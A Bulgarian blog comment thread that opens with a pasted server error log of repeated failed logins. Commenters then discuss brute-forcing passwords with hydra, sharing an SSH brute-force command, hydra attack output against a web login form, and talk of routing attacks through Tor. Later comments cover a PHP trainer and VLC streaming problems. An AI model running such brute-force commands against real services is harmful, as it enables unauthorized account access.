    [Fri Jul 11 11:55:34 2014] [error] [client 74.120.13.132] PHP Notice: Undefined index: password in /var/www/html/public_html/twig/ivymusic/libs/User.php on line 28
    [Fri Jul 11 11:55:34 2014] [error] [client 74.120.13.132] PHP Notice: Undefined index: password in /var/www/html/public_html/twig/ivymusic/libs/User.php on line 28
    [Fri Jul 11 11:55:34 2014] [error] [client 74.120.13.132] PHP Notice: Undefined index: password in /var/www/html/public_html/twig/ivymusic/libs/User.php on line 28
    [Fri Jul 11 11:55:35 2014] [error] [client 74.120.13.132] PHP Notice: Undefined index: password in /var/www/html/public_html/twig/ivymusic/libs/User.php on line 28
    [Fri Jul 11 11:55:36 2014] [error] [client 74.120.13.132] PHP Notice: Undefined index: password in /var/www/html/public_html/twig/ivymusic/libs/User.php on line 28
    [Fri Jul 11 11:55:36 2014] [error] [client 74.120.13.132] PHP Notice: Undefined index: password in /var/www/html/public_html/twig/ivymusic/libs/User.php on line 28
    [Fri Jul 11 11:55:36 2014] [error] [client 74.120.13.132] PHP Notice: Undefined index: password in /var/www/html/public_html/twig/ivymusic/libs/User.php on line 28
    [Fri Jul 11 11:55:38 2014] [error] [client 5.104.107.146] PHP Notice: Undefined index: password in /var/www/html/public_html/twig/ivymusic/libs/User.php on line 28
    [Fri Jul 11 11:55:38 2014] [error] [client 5.104.107.146] PHP Notice: Undefined index: password in /var/www/html/public_html/twig/ivymusic/libs/User.php on line 28
    [Fri Jul 11 11:55:38 2014] [error] [client 5.104.107.146] PHP Notice: Undefined index: password in /var/www/html/public_html/twig/ivymusic/libs/User.php on line 28
    [Fri Jul 11 11:55:40 2014] [error] [client 5.104.107.146] PHP Notice: Undefined index: password in /var/www/html/public_html/twig/ivymusic/libs/User.php on line 28
    [Fri Jul 11 11:55:40 2014] [error] [client 5.104.107.146] PHP Notice: Undefined index: password in /var/www/html/public_html/twig/ivymusic/libs/User.php on line 28
    [Fri Jul 11 11:55:40 2014] [error] [client 5.104.107.146] PHP Notice: Undefined index: password in /var/www/html/public_html/twig/ivymusic/libs/User.php on line 28
    [Fri Jul 11 11:55:41 2014] [error] [client 5.104.107.146] PHP Notice: Undefined index: password in /var/www/html/public_html/twig/ivymusic/libs/User.php on line 28
    [Fri Jul 11 11:55:43 2014] [error] [client 5.104.107.146] PHP Notice: Undefined index: password in /var/www/html/public_html/twig/ivymusic/libs/User.php on line 28
    [Fri Jul 11 11:55:43 2014] [error] [client 5.104.107.146] PHP Notice: Undefined index: password in /var/www/html/public_html/twig/ivymusic/libs/User.php on line 28
    [Fri Jul 11 11:55:43 2014] [error] [client 5.104.107.146] PHP Notice: Undefined index: password in /var/www/html/public_html/twig/ivymusic/libs/User.php on line 28
    [Fri Jul 11 11:55:43 2014] [error] [client 5.104.107.146] PHP Notice: Undefined index: password in /var/www/html/public_html/twig/ivymusic/libs/User.php on line 28
    [Fri Jul 11 11:55:46 2014] [error] [client 5.104.107.146] PHP Notice: Undefined index: password in /var/www/html/public_html/twig/ivymusic/libs/User.php on line 28
    [Fri Jul 11 11:55:46 2014] [error] [client 5.104.107.146] PHP Notice: Undefined index: password in /var/www/html/public_html/twig/ivymusic/libs/User.php on line 28
    [Fri Jul 11 11:55:46 2014] [error] [client 5.104.107.146] PHP Notice: Undefined index: password in /var/www/html/public_html/twig/ivymusic/libs/User.php on line 28
    [Fri Jul 11 11:55:46 2014] [error] [client 5.104.107.146] PHP Notice: Undefined index: password in /var/www/html/public_html/twig/ivymusic/libs/User.php on line 28
    [Fri Jul 11 11:55:48 2014] [error] [client 188.138.1.229] PHP Notice: Undefined index: password in /var/www/html/public_html/twig/ivymusic/libs/User.php on line 28
    [Fri Jul 11 11:55:48 2014] [error] [client 188.138.1.229] PHP Notice: Undefined index: password in /var/www/html/public_html/twig/ivymusic/libs/User.php on line 28
    [Fri Jul 11 11:55:48 2014] [error] [client 188.138.1.229] PHP Notice: Undefined index: password in /var/www/html/public_html/twig/ivymusic/libs/User.php on line 28
    [Fri Jul 11 11:55:48 2014] [error] [client 188.138.1.229] PHP Notice: Undefined index: password in /var/www/html/public_html/twig/ivymusic/libs/User.php on line 28
    [Fri Jul 11 11:55:50 2014] [error] [client 188.138.1.229] PHP Notice: Undefined index: password in /var/www/html/public_html/twig/ivymusic/libs/User.php on line 28
    [Fri Jul 11 11:55:50 2014] [error] [client 188.138.1.229] PHP Notice: Undefined index: password in /var/www/html/public_html/twig/ivymusic/libs/User.php on line 28
    [Fri Jul 11 11:55:50 2014] [error] [client 188.138.1.229] PHP Notice: Undefined index: password in /var/www/html/public_html/twig/ivymusic/libs/User.php on line 28
    [Fri Jul 11 11:55:50 2014] [error] [client 188.138.1.229] PHP Notice: Undefined index: password in /var/www/html/public_html/twig/ivymusic/libs/User.php on line 28
    [Fri Jul 11 11:55:52 2014] [error] [client 188.138.1.229] PHP Notice: Undefined index: password in /var/www/html/public_html/twig/ivymusic/libs/User.php on line 28
    [Fri Jul 11 11:55:52 2014] [error] [client 188.138.1.229] PHP Notice: Undefined index: password in /var/www/html/public_html/twig/ivymusic/libs/User.php on line 28
    [Fri Jul 11 11:55:52 2014] [error] [client 188.138.1.229] PHP Notice: Undefined index: password in /var/www/html/public_html/twig/ivymusic/libs/User.php on line 28
    [Fri Jul 11 11:55:52 2014] [error] [client 188.138.1.229] PHP Notice: Undefined index: password in /var/www/html/public_html/twig/ivymusic/libs/User.php on line 28
    [Fri Jul 11 11:55:54 2014] [error] [client 188.138.1.229] PHP Notice: Undefined index: password in /var/www/html/public_html/twig/ivymusic/libs/User.php on line 28
    [Fri Jul 11 11:55:54 2014] [error] [client 188.138.1.229] PHP Notice: Undefined index: password in /var/www/html/public_html/twig/ivymusic/libs/User.php on line 28
    [Fri Jul 11 11:55:54 2014] [error] [client 188.138.1.229] PHP Notice: Undefined index: password in /var/www/html/public_html/twig/ivymusic/libs/User.php on line 28

  232. jazzman Says:

    Върти ги, обаче дето вика gatway3 избора не е много голям ако искаш да правиш сериозна атака 🙂 Ама аз се заиграх за теста само де, освен тва не съм кракер да правя простотии 😉

  233. thd Says:

    Ако пробваш ей тъй примерно , без специални символи , горе доле колко ще иде пробвал ли си от 3 до 10 символа примерно?

    hydra -l user -V -x 3:10:aA1 ip ssh

  234. jazzman Says:

    Пробвал съм без tor и proxy-та в/у локалната си машина. Моят DELL 4 ядрен ми дава около 7500 оптита в мин и ядрата скачат на 100% разбира се.. в/у отдалечена машина е доста бавно…..ама можем да спретнем нещо паралелено да ръннем някоя атака 🙂

  235. thd Says:

    можеш да си врътнеш ssh-a с едни рестрикции да пуска само от 127.0.0.1 и да го пуснеш през tor hidden service 🙂

  236. jazzman Says:

    Варианти дал Бог 😉 По междупрочем тази атака през proxy и tor би трябвало да работи по-бързо в/у отдалечена машина или най-малко да няма осезаема разлика.Имам няколко акаунта в/у различни shared hosting компании, че шъ пробвам по-късно ако остане време.

  237. +o Says:

    Ама за какво ви е тази дикшънъри атака само бела ще си направите с нея :p

  238. Stilgar Says:

    Малко остава да ви изтрия офтопика. Не беше толкова лошо преди да изплющите 3 екрана лог.

  239. +o Says:

    хахахах +1

  240. jazzman Says:

    Моя е грешката, не съобразих, че по принцип тук не е място за такива питания, в смисъл тва не е форум……ама някакси тръгна интуитивно …. За лога най-малкото можеше да ползвам линк към кода, ама и за тва не съ сетих 🙂

  241. Фьт Дхюс Says:

    Я Жаз, къ се отзова в Джермани???

  242. jazzman Says:

    През проксито на тор съм….забелязах, че зарежда сайта по-бързо когато съм с него. През канадският адрес понякога чакам 30-40 сек докато се зареди страницата, тва се случва и към други бг сайтове хоствани в/у бг сървъри…..гледам че видин си нема държава 🙂

  243. Фьт Дхюс Says:

    Държавна проба.

  244. Фьт Дхюс Says:

    Т’ва е нещо от Операта, като пиша през друго, папример Конкверор и си имам държава.

  245. Фьт Дхюс Says:

    Те имам, нали ти казах?

  246. jazzman Says:

    През конзола пробвал ли си без браузър, да видиш кво чудо шъ излезне 🙂

  247. jazzman Says:

    Иване, тва истина ли е – https://softuni.bg/trainers
    честито, ако е верно 🙂

  248. jazzman Says:

    @thd, при комбинация от малки и големи букви (английски) и цифри с парола съставена от 8 символа в/у http-post-form при 10 паралелни задачи, виж средно кво е при мен:

    [WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort…
    [DATA] max 10 tasks per 1 server, overall 10 tasks, 218340105584896 login tries (l:1/p:218340105584896), ~2183401055849 tries per task
    [DATA] attacking service http-post-form on port 80
    [VERBOSE] Resolving addresses … done
    [STATUS] 980.00 tries/min, 980 tries in 00:01h, 218340105584185 todo in 5118145934:56h, 10 active

    Значи 980 са опитите в минута при мен с 10 задачи, но само Бог знае кога ще падне и това при положение, че се знае името, от колко символа е паролата и как е съставена…ама много безумни потребители слагат квот им падне де, така че ….. всичко зависи 🙂

  249. jazzman Says:

    Значи грубо около 7500 са когато се ползва наръчник 🙂 а тва дето питаш по-горе за rainbow table предполагам, че ще ускори процеса поне двойно 🙂

  250. Фьт Дхюс Says:

    Пробвал съм при Иван, не тук, още отдавна. Но добавката е същата и там, и тук. То аз му казах за нея. Излизат три въпросчета.

    Иначе и за треньора и аз го разбрах преди два дни. Тогава, когато се натъкнах на Adword gatakka.eu, започнах търсене, какво друго излиза на gatakka и това беше от първите резултати.

    Не се учудвам, все пак Наков надгражда телеричната академия и съответно си привиква старите кучета, дето не са свързани с Телерик. А, ако има нещо безспорно в днешните объркани времена, то е, че Иван е изключителен в php. Няма друг преподавател българин от неговият ранг. Като професионализъм може и в мрежата някъде да се спотайва някой по-добър. Аз например не бих заложил да е по-добър от Божилов. Но Божилов, колкото и да е навътре, не е толкова добър лектор. И определено не е толкова надъхващ. Пък и е правил публични само за Зенд, а не всички пишат на него. С което не обезценявам големият му принос, просто на Иван е грамаден. Едва ли не всеки втори, ако не почти всеки, е минал в една или друга степен през неговата кола. А пиечпари много брат.

    Аз мога да се гордея (това май трябва да е в кавички) и в същото време да се натъжавам много, че все още съм единственият човек взима от него интервю. А това интервю беше преди петилетка. Просто е учудващо как такива исполини си остават в Интернет и не придобиват обществена публичност извън него. В същото време по телевизията гледаме някакви калъфи като Мерчев. Последното само потвърждава тезата на Стил, че от който нищо не става, отива на държавна работа и колкото е по-некадърен, толкова по-висок пост взима.

  251. Фьт Дхюс Says:

    кола == школа

  252. +o Says:

    А бе ще успее в живота не го мисли.

  253. Фьт Дхюс Says:

    Кой Иван ли? Че той е успял. Работи високо специализирана и интересна работа (пише и на Смоко, и на други езици, има проекти в десетки сфери). Абсолютно независим е и свободно си изразява мнението. Има широки знания в други области като физика и биология, които е придобил сам (завършил е английска гимназия).

    Професията му, му позволява да не зависи от глупостите на шефове. Всички сме имали много и различни шефове, от различни полове, различна възраст и националност. Общото между всички е, че са тъпанари. На него в днешно време това не му се налага, но поради богатия си опит, го е изпитвал и може да оцени сегашната си ситуация. Не на последно място, това да се захване с професия галеница на съдбата, му позволява да има приличен за нашенските ширини доход, който да му позволи да води един по-пълноценен живот, отрупан с преживявания.

    Разбира се настоящата му професия има своите минуси. Надявам се тези неприятности да са в миналото, но в най-старата Гатака беше писал на няколко пъти, после и във виблога намекваше за психични състояния, които му е докарвала.

    Единственото, което още не е изпитал от живота е най-голямата радост да чуе да му казват тати. Но времето е пред него, той едва е навлязъл в тридесетака, има още поне десетилетие пред него, когато може да му се случи.

    Разбира се, не е осъществил още и голямата си (публична) мечта, заразила хиляди хора. Много хора биха поставили под въпрос, има ли нужда от Школопедия, щом вече има Софтуни, но пък Софтуни е само за компютърни истории, а има още толкова много области.

    Вече има и друг подобен проект, Едуками, който има предимството да стъпва върху принципно нова концепция в програмирането (още се жалвам, че не обсъждаха, а обсъждаха смотания нодджъсъ). И голямото предимство зад проекта да седи общност (тази на Варна Лаб).

    Като казах това естествено идва продължението. Но има и друго. Проект като този е извънредно зависим от общност. Едуками има общност, но реално не се е случил. А Иван не намери дори хора склонни да му помагат. Въобще у нас, проблема с общността е много дълбок. Всички сме независими, всички сме свободолюбиви, всички разбираме от всичко, всички сме свикнали да се оправяме сами. У нас е трудно дори едно семейство да е общност. Цяло чудо е, че имаме изобщо държава (все пак това е най-висшият общносттен организъм) при положение, че не можем да се разберем и за най-елементарни въпроси.

    Ако Школопедия се случи, както се случва българоезичната част на Википедия, по-добре да не се случва. Ще има хубаво в нея. Дори ще има забележителни неща, но като цяло ще е шкарт. И това е добрият вариант, възможен заради харизмата и авторитета на Иван. Лошият вариант е, просто да си остане празна като Едуками. А да повторим, че зад Едуками седи силна общност.

    Но ако казваш, че това днес, не е връхната точка в живота на Иван, то о да, прав си напълно. Големите му лични успехи, те първа предстоят. Той все още не е създал семейство. Той все още изпитва огромни трудности, защото не е усвоил някой дълбоки познания за много неща (но пък наваксва с бързи темпове). И той все още не е излязъл от Интернет. Сега точно какъв ще стане, излизайки от тук, е въпрос на спекулация.

    Може да е радио-телевизионен водещ, водещ аналитик и съветник, може да стане кмет на Пловдив. Кой знае? Но за нас верните му почитатели, предстоят интересни времена, не по-малко обогатяващи, от тези до тук. Само да е здрав, защото здравето може (да не чува дявола) да постави сериозна пречка пред всеки устремен човек.

  254. gatakka Says:

    Мерси за хубавите думи, но може ли да сменим малко фокуса на разговора от моята особа. Аз си копам по план, и всичко с времето си.
    По отношение на общностите в БГ, проблема не е, че няма условия за такива, проблема е, че всеки дърпа за себе си. Погледнете в спорта, политиката, музиката, чисто битовите отношения. Хората го приемат за „правилния“ начин.
    Просто трябва да се покаже, че има и друг начин.

  255. бацето Says:

    „Res Publica Non Dominetur“
    https://www.youtube.com/watch?v=4Gf6hq8J_DQ

  256. jazzman Says:

    @Фът, де да можеше да кажеш тез убави неща и за своят живот 🙂 Иване, наистина ти желая успехи там накъдето си се запътил. Малко стръв за чакалчетата ще има ли с отговора, коя ще е следващата ти цел? Стола на Наков, може би 🙂

  257. +o Says:

    Stream на ВарнаКонф
    rtmp://grendel.ludost.net/it-tour/varnaconf

    Сори, че не го шернах по-рано ама и аз не знаех
    Ако някой иска да зададе въпрос твиттер с #varnaconf

    ако му се плямпа повече:
    irc.ludost.net #varnaconf

    сори за рекламата, ако минава някакви граници, трийте 🙂

  258. +o Says:

    това ще е днес до към 6 часа 🙂
    после ако на някой му се гледа, сигурно ще има видеа след 3-4-5 дена

  259. +o Says:

    Чаршафа за gatakka много ме кефи 🙂

  260. jazzman Says:

    Тоз протокол (rtmp) не се рънва под мойто VLC.

  261. +o Says:

    В момента има проблем изчакай 5-10 минути. резнали май кабела в залата 🙂

  262. бацето Says:

    През firefox стрийма се гледа на:
    http://grendel.ludost.net/it-tour/

    Мерси.

  263. jazzman Says:

    Само при мен ли, под тоз стар vlc плеър не върви, е тва е лога:

    No suitable decoder module:
    VLC does not support the audio or video format „undf“. Unfortunately there is no way for you to fix this.

  264. jazzman Says:

    @бацето, и твоя линк не тръгва – излиза надпис: not supported video format ( firefox 24 съм)

  265. +o Says:

    jazzman – пробвай това
    http://grendel.ludost.net/it-tour/hls/varnaconf.m3u8

    btw споко пича който гороври в момента му е първа лекция, така че не си изпуснал много

  266. бацето Says:

    пре мен върви в момента, както можеш и отгоре да ми видиш конфигурацията с фф28 съм

  267. jazzman Says:

    @+o, същият шит 🙂

    @баце, нещо не ми аресват версият на FF и VLC 😉

  268. бацето Says:

    @jazzman сега го пуснах с iceweasel 24.5.0

    Трябва ти флаш
    /usr/lib/mozilla/plugins/libflashplayer.so

  269. +o Says:

    @jazzman – VLC media player 2.1.4 Rincewind MPlayer2 2 нямам проблеми. Аз и си ползвам mplayer вече година, та vlc го загърбих

    А какъв е тоя видео или аудио формат undf ? wtf ?

  270. +o Says:

    @jazzman – имаш ffmpeg или нещо от новите простотии avconv, libavcodec54 ? мислех че си объркал адреса или формата, обаче влс-то не го разпознава всъщност

  271. jazzman Says:

    +o, vlc-то ми е версия 1.0.1 от 2009г не е пипана.

    +баце, имам флаш и гледам видеа в youtube , версият му е от преди 4-5 г най-малко.

    „А какъв е тоя видео или аудио формат undf ?“

    Ти кажи, тва го копирах от лога на player-a.

  272. бацето Says:

    @jazzman сложи най-новия, просто замести библиотеката.
    Отделно, че адобе скоро ъпдейтваха, защото имага пробойна в сигурността.

  273. jazzman Says:

    Сложих я вече, върви нормално 🙂

  274. +o Says:

    https://trello-attachments.s3.amazonaws.com/51ece084a6bf10023c0028d7/53a72b5c2006dae546a943f3/00a3240e957797ea78e1a9de30dc3a14/support_matrix.pdf

  275. jazzman Says:

    Тва не е вярно 🙂

  276. jazzman Says:

    На лаптопа под Федора 19 и VLC 2.0.8 стрийминга тръгна нормално

  277. бацето Says:

    @gatakka бях постнал коментар в gatakka.eu в „Инсталиране на Kubuntu заедно с Windows“, обаче замина в спама, защото бях забравил да изключа no-script. Ако нещо може да видиш дали е там, но не е нищо важно като цяло.

Leave a Reply